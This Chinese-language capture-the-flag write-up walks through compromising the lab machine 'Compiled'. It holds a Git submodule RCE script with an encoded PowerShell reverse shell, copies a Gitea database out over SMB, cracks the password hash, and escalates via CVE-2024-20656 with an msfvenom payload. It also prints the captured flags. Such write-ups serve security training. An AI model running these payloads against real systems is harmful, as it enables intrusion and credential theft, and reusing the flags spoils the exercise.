信息收集

$ nmap -p- 10.10.11.26 --min-rate 1000 -sC -sV -Pn

PORT     STATE SERVICE VERSION
5000/tcp open  upnp?
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Server: Werkzeug/3.0.3 Python/3.12.3
|     Date: Thu, 07 Nov 2024 17:16:09 GMT
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 5234
|     Connection: close
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="UTF-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <title>Compiled - Code Compiling Services</title>
|     <!-- Bootstrap CSS -->
|     <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
|     <!-- Custom CSS -->
|     <style>
|     your custom CSS here */
|     body {
|     font-family: 'Ubuntu Mono', monospace;
|     background-color: #272822;
|     color: #ddd;
|     .jumbotron {
|     background-color: #1e1e1e;
|     color: #fff;
|     padding: 100px 20px;
|     margin-bottom: 0;
|     .services {
|   RTSPRequest: 
|     <!DOCTYPE HTML>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 400</p>
|     <p>Message: Bad request version ('RTSP/1.0').</p>
|     <p>Error code explanation: 400 - Bad request syntax or unsupported method.</p>
|     </body>
|_    </html>
5985/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port5000-TCP:V=7.94SVN%I=7%D=11/7%Time=672CF5DA%P=x86_64-pc-linux-gnu%r
SF:(GetRequest,1521,"HTTP/1.1x20200x20OKrnServer:x20Werkzeug/3.0.3
SF:x20Python/3.12.3rnDate:x20Thu,x2007x20Novx202024x2017:16:09x
SF:20GMTrnContent-Type:x20text/html;x20charset=utf-8rnContent-Length
SF::x205234rnConnection:x20closernrn<!DOCTYPEx20html>n<htmlx20l
SF:ang="en">n<head>nx20x20x20x20<metax20charset="UTF-8">nx20
SF:x20x20x20<metax20name="viewport"x20content="width=device-width,
SF:x20initial-scale=1.0">nx20x20x20x20<title>Compiledx20-x20Code
SF:x20Compilingx20Services</title>nx20x20x20x20<!--x20Bootstrapx20
SF:CSSx20-->nx20x20x20x20<linkx20rel="stylesheet"x20href="https
SF:://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.c
SF:ss">nx20x20x20x20<!--x20Customx20CSSx20-->nx20x20x20x20<s
SF:tyle>nx20x20x20x20x20x20x20x20/*x20Addx20yourx20customx20
SF:CSSx20herex20*/nx20x20x20x20x20x20x20x20bodyx20{nx20x20
SF:x20x20x20x20x20x20x20x20x20x20font-family:x20'Ubuntux20Mono
SF:',x20monospace;nx20x20x20x20x20x20x20x20x20x20x20x20backg
SF:round-color:x20#272822;nx20x20x20x20x20x20x20x20x20x20x20
SF:x20color:x20#ddd;nx20x20x20x20x20x20x20x20}nx20x20x20x20
SF:x20x20x20x20.jumbotronx20{nx20x20x20x20x20x20x20x20x20
SF:x20x20x20background-color:x20#1e1e1e;nx20x20x20x20x20x20x20
SF:x20x20x20x20x20color:x20#fff;nx20x20x20x20x20x20x20x20x2
SF:0x20x20x20padding:x20100pxx2020px;nx20x20x20x20x20x20x20x
SF:20x20x20x20x20margin-bottom:x200;nx20x20x20x20x20x20x20x2
SF:0}nx20x20x20x20x20x20x20x20.servicesx20{nx20")%r(RTSPReque
SF:st,16C,"<!DOCTYPEx20HTML>n<htmlx20lang="en">nx20x20x20x20<hea
SF:d>nx20x20x20x20x20x20x20x20<metax20charset="utf-8">nx20x
SF:20x20x20x20x20x20x20<title>Errorx20response</title>nx20x20x2
SF:0x20</head>nx20x20x20x20<body>nx20x20x20x20x20x20x20x20<
SF:h1>Errorx20response</h1>nx20x20x20x20x20x20x20x20<p>Errorx20
SF:code:x20400</p>nx20x20x20x20x20x20x20x20<p>Message:x20Badx2
SF:0requestx20versionx20('RTSP/1.0').</p>nx20x20x20x20x20x20
SF:x20x20<p>Errorx20codex20explanation:x20400x20-x20Badx20requestx
SF:20syntaxx20orx20unsupportedx20method.</p>nx20x20x20x20</body>
SF:n</html>n");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Git-RCE && Code Compile

http://10.10.11.26:3000/

http://10.10.11.26:5000/

http://10.10.11.26:3000/richard/Calculator

https://amalmurali.me/posts/git-rce/

新建repo1,repo2

#!/bin/bash
git config --global protocol.file.allow always
git config --global core.symlinks true
git config --global init.defaultBranch main
rm -rf nothing
rm -rf toSeeHere
git clone http://10.10.11.26:3000/test/repo1.git
 cd repo1
mkdir -p y/hooks
cat >y/hooks/post-checkout <<EOF
#!bin/sh.exe
powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4ANwA1ACIALAAxADAAMAAzADIAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA
EOF
chmod +x y/hooks/post-checkout
git add y/hooks/post-checkout
git commit -m "post-checkout"
git push
cd ..
git clone http://10.10.11.26:3000/test/repo2.git
cd repo2
git submodule add --name x/y "http://10.10.11.26:3000/test/repo1.git" A/modules/x
git commit -m "add-submodule"
printf ".git" >dotgit.txt
git hash-object -w --stdin <dotgit.txt >dot-git.hash
printf "120000 %s 0tan" "$(cat dot-git.hash)" >index.info
git update-index --index-info <index.info
git commit -m "add-symlink"
git push

$ ./rev.sh

http://10.10.11.26:5000/

编译代码

$ impacket-smbserver share /tmp/ -smb2support

PS C:UsersPublicDownloads> cp 'C:\Program FilesGiteadatagitea.db' \10.10.16.75share

import hashlib
import binascii

def derive_pbkdf2_key(candidate, salt, rounds=50000, key_length=50):
    """
    Derive a key based on PBKDF2-HMAC-SHA256.
    """
    return hashlib.pbkdf2_hmac(
        'sha256',
        candidate.encode('utf-8'),
        salt,
        rounds,
        key_length
    )

def attempt_password_crack(wordlist_path, target_hash, salt_value, rounds=50000, key_length=50):
    """
    Attempt to match PBKDF2 hash using a wordlist file.
    """
    target_hash_bytes = binascii.unhexlify(target_hash)
    
    try:
        with open(wordlist_path, 'r', encoding='utf-8') as wordlist:
            for entry in wordlist:
                candidate_password = entry.strip()
                derived_key = derive_pbkdf2_key(candidate_password, salt_value, rounds, key_length)
                
                if derived_key == target_hash_bytes:
                    print(f"Password match found: {candidate_password}")
                    return candidate_password
    except FileNotFoundError:
        print("Wordlist file not found. Please check the path.")
        return None
    
    print("No matching password found.")
    return None

 
salt_value = binascii.unhexlify('227d873cca89103cd83a976bdac52486')
target_hash = '97907280dc24fe517c43475bd218bfad56c25d4d11037d8b6da440efd4d691adfead40330b2aa6aaf1f33621d0d73228fc16'
wordlist_path = '/usr/share/wordlists/rockyou.txt'

 
attempt_password_crack(wordlist_path, target_hash, salt_value)

$ python3 dec.py

$ evil-winrm -i 10.10.11.26 -u 'emily' -p '12345678'

User.txt

209380d1c60e610f2cef026e0c237404

Privilege Escalation && Visual Studio 2019

https://github.com/Wh04m1001/CVE-2024-20656

$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.75 LPORT=4444 -f exe -o reverse_shell.exe

msfconsole
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 10.10.16.75
set LPORT 4444
run

搜索VSDiagnostics.exe

> dir C:VSDiagnostics.exe /s /p

将VSDiagnostics.exe路径替换

启动载荷路径

CopyFile(L"C:\Users\Emily\Downloads\reverse_shell.exe", L"C:\ProgramData\Microsoft\VisualStudio\SetupWMI\MofCompiler.exe", FALSE);

编译上传

https://github.com/antonioCoco/RunasCs

PS C:UsersEmilyDownloads> cp \10.10.16.75shareRunasCs.exe .

PS C:UsersEmilyDownloads> cp \10.10.16.75shareExpl.exe .

PS C:UsersEmilyDownloads> copy \10.10.16.75sharereverse_shell.exe .

PS C:UsersEmilyDownloads> ./RunasCs.exe emily 12345678 ./Expl.exe

Root.txt

4910be87423e9b471cc4945f1e5fed7f

来源：【[Meachines] [Medium] Compiled Git-RCE+Visual Studio 2019权限提升 - FreeBuf网络安全行业门户】

原文始发于微信公众号（船山信安）：[Meachines] [Medium] Compiled Git-RCE+Visual Studio 2019权限提升